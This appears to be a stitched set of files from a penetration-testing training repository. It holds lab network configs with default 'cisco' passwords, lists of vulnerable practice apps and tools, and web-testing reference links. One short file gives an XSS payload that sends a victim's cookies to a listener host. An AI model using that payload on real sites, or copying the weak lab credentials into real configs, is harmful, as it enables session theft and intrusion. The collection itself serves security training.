ExecStart=/sbin/dhclient %i -pf /var/run/dhclient.%i.pid -lf /var/lib/dhclient/dhclient.%i.lease RemainAfterExit=yes owner: root:root permissions: '0644' - path: /etc/rc.local owner: root:root permissions: '0755' content: |- #!/bin/sh ifconfig eth1 up 10.0.0.22 netmask 255.255.255.252 route add -net 10.0.0.0/8 gw 10.0.0.21 dev eth1 route add -net 192.168.0.0/28 gw 10.0.0.21 dev eth1 exit 0 </entry> </extensions> <interface id="0" name="eth1" ipv4="10.0.0.22" netPrefixLenV4="30"/> </node> <node name="server-3" type="SIMPLE" subtype="server" location="809,276"> <extensions> <entry key="config" type="string">#cloud-config bootcmd: - ln -s -t /etc/rc.d /etc/rc.local hostname: server-3 manage_etc_hosts: true runcmd: - start ttyS0 - systemctl start [email protected] - systemctl start rc-local - sed -i '/^\s*PasswordAuthentication\s\+no/d' /etc/ssh/sshd_config - echo "UseDNS no" &gt;&gt; /etc/ssh/sshd_config - service ssh restart - service sshd restart users: - default - gecos: User configured by VIRL Configuration Engine 0.23.10 lock-passwd: false name: cisco plain-text-passwd: cisco shell: /bin/bash ssh-authorized-keys: - VIRL-USER-SSH-PUBLIC-KEY sudo: ALL=(ALL) ALL write_files: - path: /etc/init/ttyS0.conf owner: root:root content: | # ttyS0 - getty # This service maintains a getty on ttyS0 from the point the system is # started until it is shut down again. start on stopped rc or RUNLEVEL=[12345] stop on runlevel [!12345] respawn exec /sbin/getty -L 115200 ttyS0 vt102 permissions: '0644' - path: /etc/systemd/system/[email protected] content: | [Unit] Description=Run dhclient on %i interface After=network.target [Service] Type=oneshot ExecStart=/sbin/dhclient %i -pf /var/run/dhclient.%i.pid -lf /var/lib/dhclient/dhclient.%i.lease RemainAfterExit=yes owner: root:root permissions: '0644' - path: /etc/rc.local owner: root:root permissions: '0755' content: |- #!/bin/sh ifconfig eth1 up 10.0.0.30 netmask 255.255.255.252 route add -net 10.0.0.0/8 gw 10.0.0.29 dev eth1 route add -net 192.168.0.0/28 gw 10.0.0.29 dev eth1 exit 0 </entry> </extensions> <interface id="0" name="eth1" ipv4="10.0.0.30" netPrefixLenV4="30"/> </node> <node name="iosv-4" type="SIMPLE" subtype="IOSv" location="428,272" ipv4="192.168.0.8"> <extensions> <entry key="config" type="string">! IOS Config generated on 2018-06-02 05:15 ! by autonetkit_0.24.0 ! hostname iosv-4 boot-start-marker boot-end-marker ! vrf definition Mgmt-intf ! address-family ipv4 exit-address-family ! address-family ipv6 exit-address-family ! ! ! no aaa new-model ! ! ip cef ipv6 unicast-routing ipv6 cef ! ! service timestamps debug datetime msec service timestamps log datetime msec no service password-encryption no service config enable password cisco ip classless ip subnet-zero no ip domain lookup ip domain name virl.info crypto key generate rsa modulus 768 ip ssh server algorithm authentication password username cisco privilege 15 secret cisco line vty 0 4 transport input ssh telnet exec-timeout 720 0 password cisco login local line con 0 password cisco ! no cdp run ! ! interface Loopback0 description Loopback ip address 192.168.0.8 255.255.255.255 ! interface GigabitEthernet0/0 description OOB Management vrf forwarding Mgmt-intf ! Configured on launch no ip address duplex full speed auto no shutdown ! interface GigabitEthernet0/1 description to iosv-1 ip address 10.0.0.18 255.255.255.252 ip ospf cost 1 duplex full speed auto no shutdown ! interface GigabitEthernet0/2 description to iosv-2 ip address 10.0.0.26 255.255.255.252 ip ospf cost 1 duplex full speed auto no shutdown ! interface GigabitEthernet0/3 description to asav-1 ip address 10.0.0.14 255.255.255.252 ip ospf cost 1 duplex full speed auto no shutdown ! ! ! router ospf 1 network 192.168.0.8 0.0.0.0 area 0 log-adjacency-changes passive-interface Loopback0 network 10.0.0.16 0.0.0.3 area 0 network 10.0.0.24 0.0.0.3 area 0 network 10.0.0.12 0.0.0.3 area 0 ! ! router bgp 1 bgp router-id 192.168.0.8 no synchronization ! ibgp ! ibgp peers ! neighbor 192.168.0.3 remote-as 1 neighbor 192.168.0.3 description iBGP peer iosv-1 neighbor 192.168.0.3 update-source Loopback0 ! neighbor 192.168.0.4 remote-as 1 neighbor 192.168.0.4 description iBGP peer iosv-2 neighbor 192.168.0.4 update-source Loopback0 ! neighbor 192.168.0.7 remote-as 1 neighbor 192.168.0.7 description iBGP peer iosv-3 neighbor 192.168.0.7 update-source Loopback0 ! ! ! address-family ipv4 network 192.168.0.8 mask 255.255.255.255 neighbor 192.168.0.3 activate neighbor 192.168.0.4 activate neighbor 192.168.0.7 activate exit-address-family ! ! ! end</entry> <entry key="AutoNetkit.mgmt_ip" type="string"></entry> </extensions> <interface id="0" name="GigabitEthernet0/1" ipv4="10.0.0.18" netPrefixLenV4="30"/> <interface id="1" name="GigabitEthernet0/2" ipv4="10.0.0.26" netPrefixLenV4="30"/> <interface id="2" name="GigabitEthernet0/3" ipv4="10.0.0.14" netPrefixLenV4="30"/> </node> <annotations/> <connection dst="/virl:topology/virl:node[1]/virl:interface[1]" src="/virl:topology/virl:node[5]/virl:interface[1]"/> <connection dst="/virl:topology/virl:node[2]/virl:interface[1]" src="/virl:topology/virl:node[6]/virl:interface[1]"/> <connection dst="/virl:topology/virl:node[8]/virl:interface[1]" src="/virl:topology/virl:node[1]/virl:interface[2]"/> <connection dst="/virl:topology/virl:node[8]/virl:interface[2]" src="/virl:topology/virl:node[2]/virl:interface[2]"/> <connection dst="/virl:topology/virl:node[4]/virl:interface[1]" src="/virl:topology/virl:node[8]/virl:interface[3]"/> <connection dst="/virl:topology/virl:node[3]/virl:interface[1]" src="/virl:topology/virl:node[4]/virl:interface[2]"/> <connection dst="/virl:topology/virl:node[7]/virl:interface[1]" src="/virl:topology/virl:node[3]/virl:interface[2]"/> </topology>
Markdown
h4cker/vulnerability_scanners/README.md
# Security Vulnerability Scanners Vulnerability scanners automate security auditing and can play a vital part in your IT security by scanning your network and websites for different security risks. These scanners are also capable of generating a prioritized list of those you should patch, and they also describe the vulnerabilities and provide steps on how to remediate them. It is also possible for some to even automate the patching process. One of the best lists of popular vulnerability scanners is maintained by OWASP at: https://owasp.org/www-community/Vulnerability_Scanning_Tools
Markdown
h4cker/vulnerable_servers/README.md
# Vulnerable Apps, Servers, and Websites The following is a collection of vulnerable servers (VMs) or websites that you can use to practice your skills (sorted alphabetically). - [bWAPP ](https://sourceforge.net/projects/bwapp/files/bWAPP) - [CloudGoat](https://github.com/RhinoSecurityLabs/cloudgoat) - [Damn Small Vulnerable Web](https://github.com/stamparm/DSVW) - [Damn Vulnerable ARM Router (DVAR)](http://blog.exploitlab.net/2018/01/dvar-damn-vulnerable-arm-router.html) - [Damn Vulnerable iOS Application (DVIA)](http://damnvulnerableiosapp.com) - [Damn Vulnerable Web App (DVWA)](https://github.com/ethicalhack3r/DVWA) - [Damn Vulnerable Web Services](https://github.com/snoopysecurity/dvws-node) - [Damn Vulnerable WordPress](https://github.com/vavkamil/dvwp) - [DOMXSS](http://www.domxss.com/domxss/) - [Extreme Vulnerable Node Application(XVNA)](https://github.com/vegabird/xvna) - [Game of Hacks](http://www.gameofhacks.com) - [Gruyere](https://google-gruyere.appspot.com) - [Hack This Site](https://www.hackthissite.org) - [Hack This](https://www.hackthis.co.uk) - [Hack Yourself first](https://hack-yourself-first.com/) - [Hackazon ](https://github.com/rapid7/hackazon) - [HellBound Hackers](https://www.hellboundhackers.org) - [Kubernetes Goat](https://github.com/madhuakula/kubernetes-goat) - [Metasploitable2 ](https://community.rapid7.com/docs/DOC-1875) - [Metasploitable3 ](https://blog.rapid7.com/2016/11/15/test-your-might-with-the-shiny-new-metasploitable3/) - [NodeGoat](https://github.com/owasp/nodegoat) - [Over The Wire Wargames](http://overthewire.org/wargames) - [OWASP Juice Shop ](https://www.owasp.org/index.php/OWASP_Juice_Shop_Project) - [OWASP Mutillidae II](https://sourceforge.net/projects/mutillidae) - [Peruggia](https://sourceforge.net/projects/peruggia) - [PortSwigger Web Security Academy](https://portswigger.net/web-security) - [RailsGoat](https://github.com/OWASP/railsgoat) - [RootMe](https://www.root-me.org) - [Server-Side Request Forgery (SSRF) vulnerable Lab](https://github.com/incredibleindishell/SSRF_Vulnerable_Lab) - [Snyk exploit-workshop](https://github.com/snyk/exploit-workshop) - [Try2Hack](http://www.try2hack.nl) - [VAmPI - vulnerable API](https://github.com/erev0s/VAmPI) - [Vicnum](http://vicnum.ciphertechs.com) - [Vulnerable Single Sign-On (SSO)](https://github.com/dogangcr/vulnerable-sso) - [WebGoat](https://github.com/WebGoat/WebGoat) - [XXE Lab](https://github.com/jbarone/xxelab) ## WebSploit Labs - [WebSploit Labs (created and maintained by Omar 立r Santos)](https://websploit.org) - [Mayhem - vulnerable container created by Omar 立r for Mayhem 2020](https://websploit.org) - [RTOV-Hackme - vulnerable container created by Omar 立r for DEF CON 27](https://websploit.org) - [RTV-Safemode - vulnerable container created by Omar 立r for DEF CON Safemode](https://websploit.org) ## Learning Platforms and VMs - [VulnHub](https://www.vulnhub.com) - [Hack the Box](https://www.hackthebox.eu/) - [TryHackMe](https://tryhackme.com/) - [eLearn Security](https://www.elearnsecurity.com/) - [PentesterLab](https://pentesterlab.com/)
Markdown
h4cker/web_application_testing/cookie_stealer_payload.md
# Cookie Stealer Payload This is the payload that can be used with the [cookie stealer Python/Flask app](https://github.com/The-Art-of-Hacking/h4cker/blob/master/python_ruby_and_bash/cookie_stealer.py). ``` <script type="text/javascript">document.location="http://127.0.0.1:1337/?c="+document.cookie;</script> ```
Markdown
h4cker/web_application_testing/docker_references.md
# Docker References ## The most amazing (#awesome) list of Docker-related resources!! * https://awesome-docker.netlify.com/ ## Container Networking - [Calico-Docker](https://www.projectcalico.org/getting-started/docker/) - Calico is a pure layer 3 virtual network that allows containers over multiple docker-hosts to talk to each other. - [Flannel](https://github.com/coreos/flannel/) - Flannel is a virtual network that gives a subnet to each host for use with container runtimes. By [@coreos][coreos] - [netshoot](https://github.com/nicolaka/netshoot) - The netshoot container has a powerful set of networking tools to help troubleshoot Docker networking issues by [@nicolaka](https://github.com/nicolaka) - [Weave][weave] (The Docker network) - Weave creates a virtual network that connects Docker containers deployed across multiple hosts. ## Container Orchestration - [athena](https://github.com/athena-oss/athena) - An automation platform with a plugin architecture that allows you to easily create and share services. - [CloudSlang](https://github.com/CloudSlang/cloud-slang) - CloudSlang is a workflow engine to create Docker process automation - [clusterdock](https://github.com/clusterdock/clusterdock) - Docker container orchestration to enable the testing of long-running cluster deployments - [ContainerShip](https://github.com/containership/containership) A simple container management platform - [Crane](https://github.com/Dataman-Cloud/crane) - Control plane based on docker built-in swarm [@Dataman-Cloud](https://github.com/Dataman-Cloud) - [Docker Flow Swarm Listener](https://github.com/vfarcic/docker-flow-swarm-listener) - Docker Flow Swarm Listener project is to listen to Docker Swarm events and send requests when a change occurs. By [@vfarcic][vfarcic] - [Haven](https://github.com/codeabovelab/haven-platform) - Haven is a simplified container management platform that integrates container, application, cluster, image, and registry managements. By [@codeabovelab](https://github.com/codeabovelab) - [Helios](https://github.com/spotify/helios) - A simple platform for deploying and managing containers across an entire fleet of servers by [@spotify](spotify) - [Kontena](https://github.com/kontena/kontena) - Application Containers for Masses [website](https://www.kontena.io/) - [Kubernetes](https://github.com/kubernetes/kubernetes) - Open source orchestration system for Docker containers by Google - [ManageIQ](https://github.com/ManageIQ/manageiq) - Discover, optimize and control your hybrid IT. By [ManageIQ](https://github.com/ManageIQ) - [Mantl](https://github.com/mantl/mantl) - Mantl is a modern platform for rapidly deploying globally distributed services - [Marathon](https://mesosphere.github.io/marathon/docs/) - Marathon is a private PaaS built on Mesos. It automatically handles hardware or software failures and ensures that an app is "always on" - [Mesos](https://mesos.apache.org/documentation/latest/docker-containerizer/) - Resource/Job scheduler for containers, VM's and physical hosts [@apache](https://mesos.apache.org/) - [Mesosphere DC/OS](https://mesosphere.com/product/) - Integrated platform for data and containers built on Apache Mesos by [@mesosphere](https://mesosphere.com) - [Nebula](https://github.com/nebula-orchestrator) - A Docker orchestration tool designed to manage massive scale distributed clusters. - [Nomad](https://github.com/hashicorp/nomad) - Easily deploy applications at any scale. A Distributed, Highly Available, Datacenter-Aware Scheduler by [@hashicorp][hashicorp] - [Rancher](https://github.com/rancher/rancher) - An open source project that provides a complete platform for operating Docker in production by [@rancher][rancher]. - [Swarmpit](https://github.com/swarmpit/swarmpit) - Lightweight Docker Swarm orchestration. Swarmpit provides clean way to manage your Docker Swarm cluster with various handful features such Service management, smart search, shared access and private registries. ## Container Reverse Proxy - [docker-flow-proxy](https://github.com/vfarcic/docker-flow-proxy) - Reconfigures proxy every time a new service is deployed, or when a service is scaled. By [@vfarcic][vfarcic] - [fabio](https://github.com/fabiolb/fabio) - A fast, modern, zero-conf load balancing HTTP(S) router for deploying microservices managed by consul. By [@magiconair](https://github.com/magiconair) (Frank Schroeder) - [Let's Encrypt Nginx-proxy Companion](https://github.com/JrCs/docker-letsencrypt-nginx-proxy-companion) - A lightweight companion container for the nginx-proxy. It allow the creation/renewal of Let's Encrypt certificates automatically. By [@JrCs](https://github.com/JrCs) - [muguet](https://github.com/mattallty/muguet) - DNS Server & Reverse proxy for Docker environments. By [@mattallty](https://github.com/mattallty) - [nginx-proxy][nginxproxy] - Automated nginx proxy for Docker containers using docker-gen by [@jwilder][jwilder] - [Swarm Ingress Router](https://github.com/tpbowden/swarm-ingress-router) - Route DNS names to Swarm services based on labels. By [@tpbowden](https://github.com/tpbowden/) - [Swarm Router](https://github.com/flavioaiello/swarm-router) - A «zero config» service name based router for docker swarm mode with a fresh and more secure approach. By [@flavioaiello](https://twitter.com/flavioaiello) - [Træfɪk](https://github.com/containous/traefik) - Automated reverse proxy and load-balancer for Docker, Mesos, Consul, Etcd... By [@EmileVauge](https://github.com/emilevauge) ## Container Security - [Anchor Cloud](https://anchore.com/cloud/)- Hosted version of Anchor Engine by [@Anchor][anchore] - [Anchor Engine](https://github.com/anchore/anchore) - Analyze images for CVE vulnerabilities and against custom security policies by [@Anchor][anchore] - [Aqua Security](https://www.aquasec.com)- Securing container-based applications from Dev to Production on any platform - [bane](https://github.com/genuinetools/bane) - AppArmor profile generator for Docker containers by [@genuinetools][genuinetools] - [CIS Docker Benchmark](https://github.com/dev-sec/cis-docker-benchmark) - This [InSpec][inspec] compliance profile implement the CIS Docker 1.12.0 Benchmark in an automated way to provide security best-practice tests around Docker daemon and containers in a production environment. By [@dev-sec](https://github.com/dev-sec) - [Clair](https://github.com/coreos/clair) - Clair is an open source project for the static analysis of vulnerabilities in appc and docker containers. By [@coreos][CoreOS] - [Dagda](https://github.com/eliasgranderubio/dagda) - Dagda is a tool to perform static analysis of known vulnerabilities, trojans, viruses, malware & other malicious threats in docker images/containers and to monitor the docker daemon and running docker containers for detecting anomalous activities. By [@eliasgranderubio](https://github.com/eliasgranderubio) - [docker-bench-security](https://github.com/docker/docker-bench-security) - script that checks for dozens of common best-practices around deploying Docker containers in production. By [@docker][docker] - [notary](https://github.com/theupdateframework/notary) - a server and a client for running and interacting with trusted collections. By [@TUF](https://github.com/theupdateframework) - [oscap-docker](https://github.com/OpenSCAP/openscap) - OpenSCAP provides oscap-docker tool which is used to scan Docker containers and images. By RedHat - [Sysdig Falco](https://github.com/draios/falco) - Sysdig Falco is an open source container security monitor. It can monitor application, container, host, and network activity and alert on unauthorized activity. - [Sysdig Secure](https://sysdig.com/product/secure/) - Sysdig Secure addresses run-time security through behavioral monitoring and defense, and provides deep forensics based on open source Sysdig for incident response. - [Twistlock](https://www.twistlock.com/) - Twistlock Security Suite detects vulnerabilities, hardens container images, and enforces security policies across the lifecycle of applications.
Markdown
h4cker/web_application_testing/README.md
# Web Application Testing References ## Vulnerable Servers There are a series of vulnerable web applications that you can use to practice your skills in a safe environment. You can get more information about them in the [vulnerable_servers directory in this repository](https://github.com/The-Art-of-Hacking/art-of-hacking/tree/master/vulnerable_servers). ## A Few Popular Tools The following are a few popular tools that you learned in the video courses part of these series: * [Burp Suite](https://portswigger.net/burp) * [OWASP Zed Attack Proxy (ZAP)](https://github.com/zaproxy/zaproxy) * [sqlmap](http://sqlmap.org/) * [httrack](https://www.httrack.com/) * [skipfish](https://code.google.com/archive/p/skipfish/) * [nikto](https://cirt.net/Nikto2) * [ffuf](https://github.com/ffuf/ffuf) Article: [A Quick Guide to Using ffuf with Burp Suite](https://medium.com/@santosomar/a-quick-guide-to-using-ffuf-with-burp-suite-713492f62242) ## WebSploit [WebSploit](https://websploit.h4cker.org/) is a virtual machine (VM) created by [Omar Santos](https://omarsantos.io) for different Cybersecurity Ethical Hacking (Web Penetration Testing) training sessions delivered at [DEFCON](https://www.wallofsheep.com/blogs/news/packet-hacking-village-workshops-at-def-con-26-finalized), [Live Training in Safari](https://www.safaribooksonline.com/search/?query=omar%20santos&extended_publisher_data=true&highlight=true&is_academic_institution_account=false&source=user&include_assessments=false&include_case_studies=true&include_courses=true&include_orioles=true&include_playlists=true&formats=live%20online%20training&sort=relevance), [video on demand LiveLessons](https://www.safaribooksonline.com/search/?query=omar%20santos&extended_publisher_data=true&highlight=true&is_academic_institution_account=false&source=user&include_assessments=false&include_case_studies=true&include_courses=true&include_orioles=true&include_playlists=true&formats=video&sort=relevance), and others. The purpose of this VM is to have a lightweight (single VM) with a few web application penetration testing tools, as well as vulnerable applications. ## How to Integrate OWASP ZAP with Jenkins You can integrate ZAP with Jenkins and even automatically create Jira issues based on your findings. You can download the [ZAP plug in here](https://wiki.jenkins.io/display/JENKINS/zap+plugin). [This video](https://www.youtube.com/watch?v=mmHZLSffCUg) provides an overview of how to integrate ## Kubernetes Security - [Kubernetes Pentest Methodology (part 1) by CyberArk](https://www.cyberark.com/threat-research-blog/kubernetes-pentest-methodology-part-1/) - [Kubernetes Pentest Methodology (part 2) by CyberArk](https://www.cyberark.com/threat-research-blog/kubernetes-pentest-methodology-part-2/) - [Kubernetes Pentest Methodology (part 2) by CyberArk](https://www.cyberark.com/threat-research-blog/kubernetes-pentest-methodology-part-3/) - [Securing Kubernetes Clusters by Eliminating Risky Permissions](https://www.cyberark.com/threat-research-blog/securing-kubernetes-clusters-by-eliminating-risky-permissions/) - [Kubernetes Network Policies Recipes](https://github.com/ahmetb/kubernetes-network-policy-recipes) - [Kubiscan](https://github.com/cyberark/KubiScan) - [Kube-hunter](https://github.com/aquasecurity/kube-hunter) - [Kubernetes Goat](https://github.com/madhuakula/kubernetes-goat) ## Docker Security - [OWASP Docker security resources](https://github.com/OWASP/Docker-Security) - [Docker Bench for Security](https://github.com/docker/docker-bench-security) - [Dockerscan](https://github.com/cr0hn/dockerscan) - [Docker Security Playground](https://github.com/giper45/DockerSecurityPlayground) ## Javascript Tools * [Retire.js](https://retirejs.github.io/retire.js) ## Popular Commercial Tools * [Qualys Web Scanning](https://www.qualys.com/apps/web-app-scanning/) * [IBM Security AppScan](https://www.ibm.com/security/application-security/appscan) ### XSS - Cross-Site Scripting - [Cross-Site Scripting – Application Security – Google](https://www.google.com/intl/sw/about/appsecurity/learning/xss/) - Introduction to XSS by [Google](https://www.google.com/). - [H5SC](https://github.com/cure53/H5SC) - HTML5 Security Cheatsheet - Collection of HTML5 related XSS attack vectors by [@cure53](https://github.com/cure53). - [XSS.png](https://github.com/jackmasa/XSS.png) - XSS mind map by [@jackmasa](https://github.com/jackmasa). - [EXCESS-XSS Guide](https://excess-xss.com/) - Comprehensive tutorial on cross-site scripting by [@JakobKallin](https://github.com/JakobKallin) and [Irene Lobo Valbuena](https://www.linkedin.com/in/irenelobovalbuena/). ### CSV Injection - [CSV Injection -> Meterpreter on Pornhub](https://news.webamooz.com/wp-content/uploads/bot/offsecmag/147.pdf) - Written by [Andy](https://blog.zsec.uk/). - [The Absurdly Underestimated Dangers of CSV Injection](http://georgemauer.net/2017/10/07/csv-injection.html) - Written by [George Mauer](http://georgemauer.net/). ### SQL Injection - [SQL Injection Cheat Sheet](https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/) - Written by [@netsparker](https://twitter.com/netsparker). - [SQL Injection Wiki](https://sqlwiki.netspi.com/) - Written by [NETSPI](https://www.netspi.com/). - [SQL Injection Pocket Reference](https://websec.ca/kb/sql_injection) - Written by [@LightOS](https://twitter.com/LightOS). ### Command Injection - [Potential command injection in resolv.rb](https://github.com/ruby/ruby/pull/1777) - Written by [@drigg3r](https://github.com/drigg3r). ### ORM Injection - [HQL for pentesters](http://blog.h3xstream.com/2014/02/hql-for-pentesters.html) - Written by [@h3xstream](https://twitter.com/h3xstream/). - [HQL : Hyperinsane Query Language (or how to access the whole SQL API within a HQL injection ?)](https://www.synacktiv.com/ressources/hql2sql_sstic_2015_en.pdf) - Written by [@_m0bius](https://twitter.com/_m0bius). - [ORM2Pwn: Exploiting injections in Hibernate ORM](https://www.slideshare.net/0ang3el/orm2pwn-exploiting-injections-in-hibernate-orm) - Written by [Mikhail Egorov](https://0ang3el.blogspot.tw/). - [ORM Injection](https://www.slideshare.net/simone.onofri/orm-injection) - Written by [Simone Onofri](https://onofri.org/). ### FTP Injection - [Advisory: Java/Python FTP Injections Allow for Firewall Bypass](http://blog.blindspotsecurity.com/2017/02/advisory-javapython-ftp-injections.html) - Written by [Timothy Morgan](https://plus.google.com/105917618099766831589). - [SMTP over XXE − how to send emails using Java's XML parser](https://shiftordie.de/blog/2017/02/18/smtp-over-xxe/) - Written by [Alexander Klink](https://shiftordie.de/). ### XXE - XML eXternal Entity - [XXE](https://phonexicum.github.io/infosec/xxe.html) - Written by [@phonexicum](https://twitter.com/phonexicum). ### CSRF - Cross-Site Request Forgery - [Wiping Out CSRF](https://medium.com/@jrozner/wiping-out-csrf-ded97ae7e83f) - Written by [@jrozner](https://medium.com/@jrozner). ### SSRF - Server-Side Request Forgery - [SSRF bible. Cheatsheet](https://docs.google.com/document/d/1v1TkWZtrhzRLy0bYXBcdLUedXGb9njTNIJXa3u9akHM/edit) - Written by [@Wallarm](https://twitter.com/wallarm). ### Rails - [Rails Security - First part](https://hackmd.io/s/SkuTVw5O-) - Written by [@qazbnm456](https://github.com/qazbnm456). ### AngularJS - [XSS without HTML: Client-Side Template Injection with AngularJS](http://blog.portswigger.net/2016/01/xss-without-html-client-side-template.html) - Written by [Gareth Heyes](https://www.blogger.com/profile/10856178524811553475). - [DOM based Angular sandbox escapes](http://blog.portswigger.net/2017/05/dom-based-angularjs-sandbox-escapes.html) - Written by [@garethheyes](https://twitter.com/garethheyes) ### SSL/TLS - [SSL & TLS Penetration Testing](https://www.aptive.co.uk/blog/tls-ssl-security-testing/) - Written by [APTIVE](https://www.aptive.co.uk/). ### Webmail ### NFS - [NFS | PENETRATION TESTING ACADEMY](https://pentestacademy.wordpress.com/2017/09/20/nfs/?t=1&cn=ZmxleGlibGVfcmVjc18y&refsrc=email&iid=b34422ce15164e99a193fea0ccc7a02f&uid=1959680352&nid=244+289476616) - Written by [PENETRATION ACADEMY](https://pentestacademy.wordpress.com/). ### Fingerprint ### Sub Domain Enumeration - [A penetration tester’s guide to sub-domain enumeration](https://blog.appsecco.com/a-penetration-testers-guide-to-sub-domain-enumeration-7d842d5570f6) - Written by [Bharath](https://blog.appsecco.com/@yamakira_). - [The Art of Subdomain Enumeration](https://blog.sweepatic.com/art-of-subdomain-enumeration/) - Written by [Patrik Hudak](https://blog.sweepatic.com/author/patrik/). ### Crypto - [Applied Crypto Hardening](https://bettercrypto.org/static/applied-crypto-hardening.pdf) - Written by [The bettercrypto.org Team](https://bettercrypto.org/). ### Web Shell - [Hunting for Web Shells](https://www.tenable.com/blog/hunting-for-web-shells) - Written by [Jacob Baines](https://www.tenable.com/profile/jacob-baines). - [Hacking with JSP Shells](https://blog.netspi.com/hacking-with-jsp-shells/) - Written by [@_nullbind](https://twitter.com/_nullbind). ### OSINT - [Hacking Cryptocurrency Miners with OSINT Techniques](https://medium.com/@s3yfullah/hacking-cryptocurrency-miners-with-osint-techniques-677bbb3e0157) - Written by [@s3yfullah](https://medium.com/@s3yfullah). - [OSINT x UCCU Workshop on Open Source Intelligence](https://www.slideshare.net/miaoski/osint-x-uccu-workshop-on-open-source-intelligence) - Written by [Philippe Lin](https://www.slideshare.net/miaoski). - [102 Deep Dive in the Dark Web OSINT Style Kirby Plessas](https://www.youtube.com/watch?v=fzd3zkAI_o4) - Presented by [@kirbstr](https://twitter.com/kirbstr). ## Evasions ### CSP - [CSP: bypassing form-action with reflected XSS](https://labs.detectify.com/2016/04/04/csp-bypassing-form-action-with-reflected-xss/) - Written by [Detectify Labs](https://labs.detectify.com/). - [TWITTER XSS + CSP BYPASS](http://www.paulosyibelo.com/2017/05/twitter-xss-csp-bypass.html) - Written by [Paulos Yibelo](http://www.paulosyibelo.com/). ### WAF - [Web Application Firewall (WAF) Evasion Techniques](https://medium.com/secjuice/waf-evasion-techniques-718026d693d8) - Written by [@secjuice](https://twitter.com/secjuice). - [Web Application Firewall (WAF) Evasion Techniques #2](https://medium.com/secjuice/web-application-firewall-waf-evasion-techniques-2-125995f3e7b0) - Written by [@secjuice](https://twitter.com/secjuice). - [Airbnb – When Bypassing JSON Encoding, XSS Filter, WAF, CSP, and Auditor turns into Eight Vulnerabilities](https://buer.haus/2017/03/08/airbnb-when-bypassing-json-encoding-xss-filter-waf-csp-and-auditor-turns-into-eight-vulnerabilities/) - Written by [@Brett Buerhaus](https://twitter.com/bbuerhaus). - [How to bypass libinjection in many WAF/NGWAF](https://medium.com/@d0znpp/how-to-bypass-libinjection-in-many-waf-ngwaf-1e2513453c0f) - Written by [@d0znpp](https://medium.com/@d0znpp). ### JSMVC - [JavaScript MVC and Templating Frameworks](http://www.slideshare.net/x00mario/jsmvcomfg-to-sternly-look-at-javascript-mvc-and-templating-frameworks) - Written by [Mario Heiderich](http://www.slideshare.net/x00mario). ### Authentication - [Trend Micro Threat Discovery Appliance - Session Generation Authentication Bypass (CVE-2016-8584)](http://blog.malerisch.net/2017/04/trend-micro-threat-discovery-appliance-session-generation-authentication-bypass-cve-2016-8584.html) - Written by [@malerisch](https://twitter.com/malerisch) and [@steventseeley](https://twitter.com/steventseeley). - [Yahoo Bug Bounty: Chaining 3 Minor Issues To Takeover Flickr Accounts](http://blog.mish.re/index.php/2017/04/29/yahoo-bug-bounty-chaining-3-minor-issues-to-takeover-flickr-accounts/) - Written by [Mishre](http://blog.mish.re/). ## Tricks ### CSRF - [Neat tricks to bypass CSRF-protection](https://zhuanlan.zhihu.com/p/32716181) - Written by [Twosecurity](https://twosecurity.io/). - [Exploiting CSRF on JSON endpoints with Flash and redirects](https://blog.appsecco.com/exploiting-csrf-on-json-endpoints-with-flash-and-redirects-681d4ad6b31b) - Written by [@riyazwalikar](https://blog.appsecco.com/@riyazwalikar). - [Stealing CSRF tokens with CSS injection (without iFrames)](https://github.com/dxa4481/cssInjection) - Written by [@dxa4481](https://github.com/dxa4481). ### Remote Code Execution - [Exploiting Node.js deserialization bug for Remote Code Execution](https://opsecx.com/index.php/2017/02/08/exploiting-node-js-deserialization-bug-for-remote-code-execution/) - Written by [OpSecX](https://opsecx.com/index.php/author/ajinabraham/). - [DRUPAL 7.X SERVICES MODULE UNSERIALIZE() TO RCE](https://www.ambionics.io/blog/drupal-services-module-rce) - Written by [Ambionics Security](https://www.ambionics.io/). - [How we exploited a remote code execution vulnerability in math.js](https://capacitorset.github.io/mathjs/) - Written by [@capacitorset](https://github.com/capacitorset). - [GitHub Enterprise Remote Code Execution](http://exablue.de/blog/2017-03-15-github-enterprise-remote-code-execution.html) - Written by [@iblue](https://github.com/iblue). - [How I Chained 4 vulnerabilities on GitHub Enterprise, From SSRF Execution Chain to RCE!](http://blog.orange.tw/2017/07/how-i-chained-4-vulnerabilities-on.html) - Written by [Orange](http://blog.orange.tw/). - [How i Hacked into a PayPal's Server - Unrestricted File Upload to Remote Code Execution](http://blog.pentestbegins.com/2017/07/21/hacking-into-paypal-server-remote-code-execution-2017/) - Written by [Vikas Anil Sharma](http://blog.pentestbegins.com/). ### XSS - [Query parameter reordering causes redirect page to render unsafe URL](https://hackerone.com/reports/293689) - Written by [kenziy](https://hackerone.com/kenziy). - [ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes, and everything else](http://www.slideshare.net/x00mario/es6-en) - Written by [Mario Heiderich](http://www.slideshare.net/x00mario). - [How I found a $5,000 Google Maps XSS (by fiddling with Protobuf)](https://medium.com/@marin_m/how-i-found-a-5-000-google-maps-xss-by-fiddling-with-protobuf-963ee0d9caff#.u50nrzhas) - Written by [@marin_m](https://medium.com/@marin_m). - [DON'T TRUST THE DOM: BYPASSING XSS MITIGATIONS VIA SCRIPT GADGETS](https://www.blackhat.com/docs/us-17/thursday/us-17-Lekies-Dont-Trust-The-DOM-Bypassing-XSS-Mitigations-Via-Script-Gadgets.pdf) - Written by [Sebastian Lekies](https://twitter.com/slekies), [Krzysztof Kotowicz](https://twitter.com/kkotowicz), and [Eduardo Vela](https://twitter.com/sirdarckcat). - [Uber XSS via Cookie](http://zhchbin.github.io/2017/08/30/Uber-XSS-via-Cookie/) - Written by [zhchbin](http://zhchbin.github.io/). - [DOM XSS – auth.uber.com](http://stamone-bug-bounty.blogspot.tw/2017/10/dom-xss-auth_14.html) - Written by [StamOne_](http://stamone-bug-bounty.blogspot.tw/). - [Stored XSS on Facebook](https://opnsec.com/2018/03/stored-xss-on-facebook/) - Written by [Enguerran Gillier](https://opnsec.com/). ### SQL Injection - [MySQL Error Based SQL Injection Using EXP](https://www.exploit-db.com/docs/37953.pdf) - Written by [@osandamalith](https://twitter.com/osandamalith). - [SQL injection in an UPDATE query - a bug bounty story!](http://zombiehelp54.blogspot.jp/2017/02/sql-injection-in-update-query-bug.html) - Written by [Zombiehelp54](http://zombiehelp54.blogspot.jp/). - [GitHub Enterprise SQL Injection](http://blog.orange.tw/2017/01/bug-bounty-github-enterprise-sql-injection.html) - Written by [Orange](http://blog.orange.tw/). ### NoSQL Injection - 